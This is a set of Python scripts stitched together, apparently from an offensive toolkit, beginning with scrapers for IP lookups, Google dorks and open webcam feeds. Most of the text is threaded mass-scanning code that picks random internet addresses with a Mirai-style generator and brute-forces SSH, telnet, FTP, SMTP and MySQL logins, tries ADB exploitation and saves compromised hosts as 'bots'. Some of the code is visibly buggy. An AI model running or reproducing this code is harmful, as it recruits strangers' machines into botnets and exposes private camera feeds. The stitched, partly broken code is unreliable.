import requests,re
from bs4 import BeautifulSoup
u='https://check-host.net/ip-info?host=205.185.114.231'
c=requests.get(u,headers = {'User-Agent': "ala ala"}).text
soup= BeautifulSoup(c,'html.parser')
la=soup.find_all('a')
l=[]
for i in la:
 if "#ip_info-dbip" in str(i):
  l.append(remove_html_tags(str(i)).strip().replace('\n',' '))
 if "#ip_info-ip2location" in str(i):
  l.append(remove_html_tags(str(i)).strip().replace('\n',' '))
 if "#ip_info-geolite2" in str(i):
  l.append(remove_html_tags(str(i)).strip().replace('\n',' '))
p=soup.find_all('table')
o=0
di={}
for x in p:
 try:
  do={}
  y=x.find_all('tr')
  for w in y:
   a=w.find_all('td')
   try:
    c=str(a[0]).split('<td>')[1].split('</td>')[0].strip()
    d=str(a[1]).split('<td>')[1].split('</td>')[0].strip()
    d=remove_html_tags(d).strip().replace('\n',' ')
    do.update({c:d})
   except:
    pass
  di.update({l[o]:do})
  o+=1
 except:
  pass
for x in di:
 print (x)
 print('')
 for y in di[x]:
  print(y+": "+di[x][y])
 print('')


import requests,re
from bs4 import BeautifulSoup
def get_cou():
  l=[]
  u='https://en.wikipedia.org/wiki/List_of_ISO_3166_country_codes'
  c=requests.get(u, headers = {'User-Agent': 'ala'}).text
  soup = BeautifulSoup(c,"html.parser")
  p=soup.find_all('table',class_="wikitable sortable")
  for x in p:
   for y in x.find_all('tr'):
    try:
     l.append( str(y.find_all('td')[-1]).split('<a href="/wiki/.')[1].split('"')[0])
    except:
     pass
   break
  print(len(l))
  print(str(l))
get_cou()


import cgi,requests,os,random,re,hashlib,urllib,sys,cfscrape
from googlesearch import search
from bane.payloads import ua
from bane.hasher import *
if  sys.version_info < (3,0):
    import HTMLParser
else:
    import html.parser as HTMLParser
import bs4
from bs4 import BeautifulSoup
from bane.payloads import *

def clear_file(w):
 with open(w,'w'):
    pass
def delete_file(w):
 s=0
 if os.path.exists(w):
  os.remove(w)
  s+=1
 return s
def write_file(w,fi):
    with open(fi ,"a+") as f:
        f.write(w+'\n')
        return   
def read_file(w):
    with open(w ,"r") as f:
        return f.readlines()
def create_file(w):
    with open(w ,"a+") as f:
     pass   
def get_cf_cookie(domain,user_agent):
  try:
   s = cfscrape.create_scraper()
   c = s.get_cookie_string("http://"+domain,user_agent=user_agent)
   return {user_agent: str(c).split("'")[1].split("'")[0]}
  except:
   return {}
def HTB_invitation():
 try:
  r=requests.post('https://www.hackthebox.eu/api/invite/generate',headers={'User-Agent':random.choice(ua)},data={'':''}).text
  a=r.split('"code":"')[1].split('"')[0]
  return base64decode(a)
 except:
  return None
def facebook_id(u):
 try:
  r=requests.post('https://lookup-id.com/#',data={"fburl":u,"check":"Lookup"}).text
  return r.split('<p id="code-wrap"><span id="code">')[1].split('<')[0]
 except:
  return None
def check_file_virustotal(f,proxy=None,timeout=10):
 if proxy:
  proxy={'http':'http://'+proxy}
 s=sha256fl(f)
 u="https://www.virustotal.com/en/file/"+s+"/analysis/"
 try:
  r=requests.get(u,headers = {'User-Agent': random.choice(ua)},allow_redirects=False,proxies=proxy,timeout=timeout)
  if (r.status_code==302):
   return {"status": r.status_code,"reason":"File's signature wasn't recognized by VirusTotal.\nTry to upload the file manually if you want to make sure."}
  elif r.status_code==200:
   w=""
   for x in r.text:
    if (len(w)<1001):
     w+=x
   w=w[931:len(w)-3].strip()
   w=w.replace("\n ","")
   return {"status":r.status_code,"reason":w}
  else:
   return {"status":r.status_code,"reason":"something went wrong"}
 except Exception as e:
  return {"status":e,"reason":"error with the process"}
def google_dorking(q,max_results=100,language='en',start_from=1, stop_on=None,top_level_domain='com',pause=2):
 j=[]
 j+=search(q,num=max_results,lang=language,start=start_from, stop=stop_on,tld="com", pause=2)
 l=[]
 for x in j:
  if x not in l:
   l.append(x)
 return l
def escape_html(s):
 '''
   function to return escaped html string
 '''
 return cgi.escape(s,quote=True)
def unescape_html(s):
 '''
   function to return unescaped html string
 '''
 return HTMLParser.HTMLParser().unescape(s).encode("utf-8")
def webhint_report(ur,proxy=None,timeout=10):
 '''
   this function takes any webpage link and returns a report link from webhint.io.
'''
 u="https://webhint.io/scanner/"
 if proxy:
  proxy={'http':'http://'+proxy}
 r=''
 if ("://" not in ur):
  return r
 try:
  s=requests.session()
  s.get(u,proxies=proxy,timeout=timeout)
  data={"url":ur}
  a=s.post(u, data,proxies=proxy,timeout=timeout).text
  soup=BeautifulSoup(a, "html.parser")
  s=soup.find_all("span", class_="permalink-content")
  for x in s:
   try:
    r= x.a["href"]
   except Exception as ex:
    pass
 except Exception as e:
  pass
 return r
def youtube_search(q,proxy=None,timeout=10):
 '''
   this function is for searching on youtub and returning a links of related videos.
'''
 q=q.replace(" ","+")
 u="https://www.youtube.com/results"
 params={"search_query":q}
 l=[]
 try:
  r=requests.get(u,params,headers = {'User-Agent': random.choice(ua)},proxies=proxy,timeout=timeout).text
  soup=BeautifulSoup(r,"html.parser")
  yt = soup.find_all(attrs={'class':'yt-uix-tile-link'})
  for vi in yt:
   try:
    vi="https://www.youtube.com"+str(vi['href'])
    if (vi not in l):
     l.append(vi)
   except Exception as ex:
    pass
 except Exception as e:
  pass
 return l

def web_cams(count=10,by={'country':'us'},timeout=10):
 a=0
 f={}
 x=1
 if by:
  key=by.keys()[0].lower()
  if key not in ['country','tag','city','timezone','type']:
   raise Exception('Your search must be in one of these categories: country, city, timezone, type, tag')
  value=by[key].lower()
  if 'country' in by:
   if by['country'].lower() not in ['af', 'ax', 'al', 'dz', 'as', 'ad', 'ao', 'ai', 'aq', 'ag', 'ar', 'am', 'aw', 'au', 'at', 'az', 'bs', 'bh', 'bd', 'bb', 'by', 'be', 'bz', 'bj', 'bm', 'bt', 'bo', 'bq', 'ba', 'bw', 'br', 'io', 'bn', 'bg', 'bf', 'bi', 'cv', 'kh', 'cm', 'ca', 'ky', 'cf', 'td', 'cl', 'cn', 'cx', 'cc', 'co', 'km', 'cd', 'cg', 'ck', 'cr', 'ci', 'hr', 'cu', 'cw', 'cy', 'cz', 'dk', 'dj', 'dm', 'do', 'ec', 'eg', 'sv', 'gq', 'er', 'ee', 'sz', 'et', 'fk', 'fo', 'fj', 'fi', 'fr', 'gf', 'pf', 'tf', 'ga', 'gm', 'ge', 'de', 'gh', 'gi', 'gr', 'gl', 'gd', 'gp', 'gu', 'gt', 'gg', 'gn', 'gw', 'gy', 'ht', 'hm', 'va', 'hn', 'hk', 'hu', 'is', 'in', 'id', 'ir', 'iq', 'ie', 'im', 'il', 'it', 'jm', 'jp', 'je', 'jo', 'kz', 'ke', 'ki', 'kp', 'kr', 'kw', 'kg', 'la', 'lv', 'lb', 'ls', 'lr', 'ly', 'li', 'lt', 'lu', 'mo', 'mk', 'mg', 'mw', 'my', 'mv', 'ml', 'mt', 'mh', 'mq', 'mr', 'mu', 'yt', 'mx', 'fm', 'md', 'mc', 'mn', 'me', 'ms', 'ma', 'mz', 'mm', 'na', 'nr', 'np', 'nl', 'nc', 'nz', 'ni', 'ne', 'ng', 'nu', 'nf', 'mp', 'no', 'om', 'pk', 'pw', 'ps', 'pa', 'pg', 'py', 'pe', 'ph', 'pn', 'pl', 'pt', 'pr', 'qa', 're', 'ro', 'ru', 'rw', 'bl', 'sh', 'kn', 'lc', 'mf', 'pm', 'vc', 'ws', 'sm', 'st', 'sa', 'sn', 'rs', 'sc', 'sl', 'sg', 'sx', 'sk', 'si', 'sb', 'so', 'za', 'gs', 'ss', 'es', 'lk', 'sd', 'sr', 'se', 'ch', 'sy', 'tw', 'tj', 'tz', 'th', 'tl', 'tg', 'tk', 'to', 'tt', 'tn', 'tr', 'tm', 'tc', 'tv', 'ug', 'ua', 'ae', 'gb', 'us', 'uy', 'uz', 'vu', 've', 'vn', 'vg', 'vi', 'wf', 'ye', 'zm', 'zw']:
    raise Exception('Unexisting Country code')
  url="https://www.insecam.org/en/by{}/{}/?page=".format(key,value)
 else:
  url="https://www.insecam.org/en/byrating/?page="
 while True:
  try:
   soup = BeautifulSoup(requests.get(url+str(x), headers={'User-Agent': random.choice(ua)},timeout=timeout).text,"html.parser")
   fi = soup.findAll('img',{'class':'thumbnail-item__img img-responsive'})
   for i in fi:
    j=HTMLParser.HTMLParser().unescape(i['src'])
    o=HTMLParser.HTMLParser().unescape(i['title'])
    f.update({j:o})
   if (len(fi)==0 ) or (a==len(f)):
    break
   a=len(f)
  except Exception as e:
   break
  if len(f)>=int(count):
    break
  x+=1
 return {k: f[k] for k in f.keys()[:int(count)]}


import os,sys,socket,random,time,threading,smtplib,xtelnet
from bane.payloads import *
from bane.vulns import adb_exploit,exposed_telnet
from ftplib import FTP
linux=True
if os.path.isdir('/data/data')==True:
    adr=True
if os.path.isdir('/data/data/com.termux/')==True:
    termux=True
wido=False
if (sys.platform == "win32") or( sys.platform == "win64"):
 wido=True
try:
    import pexpect
except:
    pass
import mysqlcp
from bane.bruteforcer import *
from bane.extrafun import create_file,write_file
def getip():
 '''
   this function was inspired by the scanning file in mirai's source code to returns a safe IP to bruteforce.
'''
 d=[3,6,7,10,11,15,16,21,22,23,26,28,29,30,33,55,56,127,214,215]
 f=[100,169,172,198]
 while True:
  o1=random.randint(1,253)
  o2=random.randint(0,254)
  if (o1 not in d):
   if o1 in f:
    if ((o1==192)and(o2!=168)):
     return '{}.{}.{}.{}'.format(o1,o2,random.randint(0,255),random.randint(0,255))
    if ((o2==172)and((o2<=16)and(o2>=32))):
     return '{}.{}.{}.{}'.format(o1,o2,random.randint(0,255),random.randint(0,255))
    if((o1==100)and(o2!=64)):
     return '{}.{}.{}.{}'.format(o1,o2,random.randint(0,255),random.randint(0,255))
    if((o1==169)and (o2!=254)):
     return '{}.{}.{}.{}'.format(o1,o2,random.randint(0,255),random.randint(0,255))
    if((o1==198)and(o2!=18)):
     return '{}.{}.{}.{}'.format(o1,o2,random.randint(0,255),random.randint(0,255))
   else:
    return '{}.{}.{}.{}'.format(o1,o2,random.randint(0,255),random.randint(0,255))
'''
  the following functions are used to scan safe IPs all over the internet with a wordlist, it can scan bruteforce their: ftp, ssh, telnet, smtp and mysql logins then save them on text files in the same directory.
  it's highly recommended to be used with a VPS or your slow internet speed will be an obstacle to your scan.
'''
global port_sc
port_sc=None
global ehlo_sc
ehlo_sc=True
global helo_sc
helo_sc=False
global ttls_sc
ttls_sc=False
class iots(threading.Thread):
 def run(self):
  self.ip_seg=ip_seg
  self.timeout=_timeout
  self.port=port_sc
  time.sleep(2)
  while (stop!=True):
   if self.ip_seg==None:
     ip=getip()
   else:
     ip=self.ip_seg.format(random.randint(0,255),random.randint(0,255),random.randint(0,255),random.randint(0,255))
   i=False
   try:
    so=socket.socket()
    so.settimeout(self.timeout)
    so.connect((ip,self.port))
    i=True
    so.close()
   except Exception as ex: 
    pass
   if i==True:
    for x in wordlist:
     if stop==True:
         break
     try:
      username=x.split(':')[0]
      password=x.split(':')[1]
      if wido==True:
       q=ssh_win(ip,username,password,timeout=self.timeout,p=self.port)
      elif termux==True:
       q=ssh_andro(ip,username,password,timeout=self.timeout,p=self.port)
      else:
       q=ssh_linux(ip,username,password,timeout=self.timeout,p=self.port)
      if q==True:
       ip+=':'+username+':'+password
       print (ip)
       write_file(ip,filen)
       break
     except Exception as e: 
      pass
  self.ip_seg=None
  self.timeout=None
def mass_ssh(threads=100,word_list=wordlist,filename='ssh_bots.txt',ip_range=None,timeout=5,p=22):
 global stop
 stop=False
 global port_sc
 port_sc=p
 global _timeout
 _timeout=timeout
 global ip_seg
 ip_seg=ip_range
 create_file(filename)
 global filen
 filen=filename
 global wordlist
 wordlist=word_list
 thr=[]
 for x in range(threads):
  try:
   t=iots().start()
   thr.append(t)
   time.sleep(0.001)
  except:
   pass
 while (stop!=True):
  try:
    time.sleep(.1)
  except KeyboardInterrupt:
    stop=True
    break
 for x in thr:
    try:
      x.join(1)
    except Exception as e:
      pass
    del x
class iott(threading.Thread):
 def run(self):
  self.ip_seg=ip_seg
  self.timeout=_timeout
  self.port=port_sc
  time.sleep(2)
  while (stop!=True):
   if self.ip_seg==None:
     ip=getip()
   else:
     ip=self.ip_seg.format(random.randint(0,255),random.randint(0,255),random.randint(0,255),random.randint(0,255))
   i=False
   try:
    so=socket.socket()
    so.settimeout(self.timeout)
    so.connect((ip,self.port))
    i=True
    so.close()
   except Exception as ex: 
    pass
   if i==True:
    if exposed_telnet(ip,timeout=self.timeout,p=self.port)==True:
        ip+='::'
        print (ip)
        write_file(ip,filen)
    else:
     for x in wordlist:
      try:
       username=x.split(':')[0]
       password=x.split(':')[1]
       q= telnet(ip,username,password,timeout=self.timeout,p=self.port)
       if q==True:
        ip+=':'+username+':'+password
        print (ip)
        write_file(ip,filen)
        break
      except Exception as e: 
       pass
  self.ip_seg=None
  self.timeout=None
def mass_telnet(threads=500,word_list=wordlist,filename='telnet_bots.txt',ip_range=None,timeout=5,p=23):
 global stop
 stop=False
 global port_sc
 port_sc=p
 global _timeout
 _timeout=timeout
 global ip_seg
 ip_seg=ip_range
 create_file(filename)
 global filen
 filen=filename
 global wordlist
 wordlist=word_list
 thr=[]
 for x in range(threads):
  try:
   t=iott().start()
   thr.append(t)
   time.sleep(0.001)
  except:
   pass
 while (stop!=True):
  try:
    time.sleep(.1)
  except KeyboardInterrupt:
    stop=True
    break
 for x in thr:
    try:
      x.join(1)
    except Exception as e:
      pass
    del x
class iotelt(threading.Thread):
 def run(self):
  self.ip_seg=ip_seg
  self.timeout=_timeout
  self.port=port_sc
  time.sleep(2)
  while (stop!=True):
   if self.ip_seg==None:
     ip=getip()
   else:
     ip=self.ip_seg.format(random.randint(0,255),random.randint(0,255),random.randint(0,255),random.randint(0,255))
   i=False
   try:
    so=socket.socket()
    so.settimeout(self.timeout)
    so.connect((ip,self.port))
    i=True
    so.close()
   except Exception as ex: 
    pass
   if i==True:
     try:
      q= exposed_telnet(ip,timeout=self.timeout,p=self.port)
      if q==True:
       print (ip)
       write_file(ip,filen)
     except Exception as e: 
      pass
  self.ip_seg=None
  self.timeout=None
def mass_exposed_telnet(threads=500,filename='exposed_telnet_bots.txt',ip_range=None,timeout=5,p=23):
 global stop
 stop=False
 global port_sc
 port_sc=p
 global _timeout
 _timeout=timeout
 global ip_seg
 ip_seg=ip_range
 create_file(filename)
 global filen
 filen=filename
 global wordlist
 wordlist=word_list
 thr=[]
 for x in range(threads):
  try:
   t=iotelt().start()
   thr.append(t)
   time.sleep(0.001)
  except:
   pass
 while (stop!=True):
  try:
    time.sleep(.1)
  except KeyboardInterrupt:
    stop=True
    break
 for x in thr:
    try:
      x.join(1)
    except Exception as e:
      pass
    del x
class iotf1(threading.Thread):
 def run(self):
  self.ip_seg=ip_seg
  self.timeout=_timeout
  time.sleep(2)
  while (stop!=True):
   if self.ip_seg==None:
     ip=getip()
   else:
     ip=self.ip_seg.format(random.randint(0,255),random.randint(0,255),random.randint(0,255),random.randint(0,255))
   i=False
   try:
    so=socket.socket()
    so.settimeout(self.timeout)
    so.connect((ip,21))
    i=True
    so.close()
   except Exception as ex: 
    pass
   if i==True:
    for x in wordlist:
     try:
      username=x.split(':')[0]
      password=x.split(':')[1]
      if ftp(ip,username,password,timeout=self.timeout)==True:
       ip+=':'+username+':'+password
       print (ip)
       write_file(ip,filen)
       break
     except Exception as e: 
      pass
  self.ip_seg=None
  self.timeout=None
def mass_ftp(threads=100,meth=1,word_list=wordlist,filename='ftp_bots.txt',ip_range=None,timeout=5):
 global ip_seg
 ip_seg=ip_range
 global _timeout
 _timeout=timeout
 global stop
 stop=False
 create_file(filename)
 global filen
 filen=filename
 global wordlist
 wordlist=word_list
 thr=[]
 for x in range(threads):
  try:
   t=iotf1().start()
   thr.append(t)
   time.sleep(0.001)
  except:
   pass
 while (stop!=True):
  try:
    time.sleep(.1)
  except KeyboardInterrupt:
    stop=True
    break
 for x in thr:
    try:
      x.join(1)
    except Exception as e:
      pass
    del x
class iotf2(threading.Thread):
 def run(self):
  self.ip_seg=ip_seg
  self.timeout=_timeout
  time.sleep(2)
  while (stop!=True):
   if self.ip_seg==None:
     ip=getip()
   else:
     ip=self.ip_seg.format(random.randint(0,255),random.randint(0,255),random.randint(0,255),random.randint(0,255))
   i=False
   try:
    so=socket.socket()
    so.settimeout(self.timeout)
    so.connect((ip,21))
    i=True
    so.close()
   except Exception as ex: 
    pass
   if i==True:
     try:
      if ftp_anon(ip,timeout=self.timeout)==True:
       print (ip)
       write_file(ip,filen)
     except Exception as e: 
      pass
  self.ip_seg=None
  self.timeout=None
def mass_ftp_anon(threads=100,filename='ftp_anon_bots.txt',ip_range=None,timeout=5):
 global ip_seg
 ip_seg=ip_range
 global _timeout
 _timeout=timeout
 global stop
 stop=False
 create_file(filename)
 global filen
 filen=filename
 thr=[]
 for x in range(threads):
  try:
   t=iotf2().start()
   thr.append(t)
   time.sleep(0.001)
  except:
   pass
 while (stop!=True):
  try:
    time.sleep(.1)
  except KeyboardInterrupt:
    stop=True
    break
 for x in thr:
    try:
      x.join(1)
    except Exception as e:
      pass
    del x
class iotsm(threading.Thread):
 def run(self):
  self.ip_seg=ip_seg
  self.timeout=_timeout
  self.port=port_sc
  self.ehlo=ehlo_sc
  self.helo=helo_sc
  self.ttls=ttls_sc
  time.sleep(2)
  while (stop!=True):
   if self.ip_seg==None:
     ip=getip()
   else:
     ip=self.ip_seg.format(random.randint(0,255),random.randint(0,255),random.randint(0,255),random.randint(0,255))
   try:
    so=socket.socket()
    so.settimeout(self.timeout)
    so.connect((ip,25))
    i=True
    so.close()
   except Exception as ex: 
    pass
   if i==True:
    for x in wordlist:
     try:
      username=x.split(':')[0]
      password=x.split(':')[1]
      if smtp(ip,username,password,p=self.port,ehlo=self.ehlo,helo=self.helo,ttls=self.ttls)==True:
       ip+=':'+username+':'+password
       print (ip)
       write_file(ip,filen)
     except Exception as e: 
      pass
  self.ip_seg=None
  self.timeout=None
def mass_smtp(o,threads=100,word_list=wordlist,filename='smtp_bots.txt',ip_range=None,timeout=5,p=25,ehlo=True,helo=False,ttls=False):
 global ip_seg
 ip_seg=ip_range
 global ehlo_sc
 ehlo_sc=ehlo
 global helo_sc
 helo_sc=helo
 global ttls_sc
 ttls_sc=ttls
 global port_sc
 port_sc=p
 global _timeout
 _timeout=timeout
 global stop
 stop=False
 create_file(filename)
 global filen
 filen=filename
 global octet
 octet=o
 global wordlist
 wordlist=word_list
 thr=[]
 for x in range(threads):
  try:
   t=iotsm().start()
   thr.append(t)
   time.sleep(0.001)
  except:
   pass
 while (stop!=True):
  try:
    time.sleep(.1)
  except KeyboardInterrupt:
    stop=True
    break
 for x in thr:
    try:
      x.join(1)
    except Exception as e:
      pass
    del x
class iotmy(threading.Thread):
 def run(self):
  self.ip_seg=ip_seg
  self.timeout=_timeout
  time.sleep(2)
  while (stop!=True):
   if self.ip_seg==None:
     ip=getip()
   else:
     ip=self.ip_seg.format(random.randint(0,255),random.randint(0,255),random.randint(0,255),random.randint(0,255))
   i=False
   try:
    so=socket.socket()
    so.settimeout(self.timeout)
    so.connect((ip,3306))
    i=True
    so.close()
   except Exception as ex: 
    pass
   if i==True:
    for x in wordlist:
     try:
      username=x.split(':')[0]
      password=x.split(':')[1]
      if mysql(ip,username,password)==True:
       ip+=':'+username+':'+password
       print (ip)
       write_file(ip,filen)
       break
     except Exception as e: 
      pass
  self.ip_seg=None
  self.timeout=None
def mass_mysql(threads=100,word_list=wordlist,filename='mysql_bots.txt',ip_range=None,timeout=5):
 global ip_seg
 ip_seg=ip_range
 global _timeout
 _timeout=timeout
 global stop
 stop=False
 create_file(filename)
 global filen
 filen=filename
 global wordlist
 wordlist=word_list
 thr=[]
 for x in range(threads):
  try:
   t=iotmy().start()
   thr.append(t)
   time.sleep(0.001)
  except:
   pass
 while (stop!=True):
  try:
    time.sleep(.1)
  except KeyboardInterrupt:
    stop=True
    break
 for x in thr:
    try:
      x.join(1)
    except Exception as e:
      pass
    del x
class iotmy2(threading.Thread):
 def run(self):
  self.ip_seg=ip_seg
  self.timeout=_timeout
  time.sleep(2)
  while (stop!=True):
   if self.ip_seg==None:
     ip=getip()
   else:
     ip=self.ip_seg.format(random.randint(0,255),random.randint(0,255),random.randint(0,255),random.randint(0,255))
   i=False
   try:
    so=socket.socket()
    so.settimeout(self.timeout)
    so.connect((ip,3306))
    i=True
    so.close()
   except Exception as ex: 
    pass
   if i==True:
     try:
      if mysql(ip,'root','')==True:
       ip+=':root:'
       print (ip)
       write_file(ip,filen)
     except Exception as e: 
      pass
  self.ip_seg=None
  self.timeout=None
def mass_mysql_default(threads=100,word_list=wordlist,filename='mysql_default_bots.txt',ip_range=None,timeout=5):
 global ip_seg
 ip_seg=ip_range
 global _timeout
 _timeout=timeout
 global stop
 stop=False
 create_file(filename)
 global filen
 filen=filename
 global wordlist
 wordlist=word_list
 thr=[]
 for x in range(threads):
  try:
   t=iotmy2().start()
   thr.append(t)
   time.sleep(0.001)
  except:
   pass
 while (stop!=True):
  try:
    time.sleep(.1)
  except KeyboardInterrupt:
    stop=True
    break
 for x in thr:
    try:
      x.join(1)
    except Exception as e:
      pass
    del x
class iotadb(threading.Thread):
 def run(self):
  self.ip_seg=ip_seg
  self.timeout=_timeout
  time.sleep(2)
  while (stop!=True):
   if self.ip_seg==None:
     ip=getip()
   else:
     ip=self.ip_seg.format(random.randint(0,255),random.randint(0,255),random.randint(0,255),random.randint(0,255))
   i=False
   try:
    so=socket.socket()
    so.settimeout(self.timeout)
    so.connect((ip,5555))
    i=True
    so.close()
   except Exception as ex: 
    pass
   if i==True:
     try:
      q=adb_exploit(ip,timeout=self.timeout)
      if q==True:
       print (ip)
       write_file(ip,filen)
     except Exception as e: 
      pass
  self.ip_seg=None
  self.timeout=None
def mass_adb(threads=100,word_list=wordlist,filename='adb_bots.txt',ip_range=None,timeout=5):
 global ip_seg
 ip_seg=ip_range
 global _timeout
 _timeout=timeout
 global stop
 stop=False
 create_file(filename)
 global filen
 filen=filename
 global wordlist
 wordlist=word_list
 thr=[]
 for x in range(threads):
  try:
   t=iotadb().start()
   thr.append(t)
   time.sleep(0.001)
  except:
   pass
 while (stop!=True):
  try:
    time.sleep(.1)
  except KeyboardInterrupt:
    stop=True
    break
 for x in thr:
    try:
      x.join(1)
    except Exception as e:
      pass
    del x
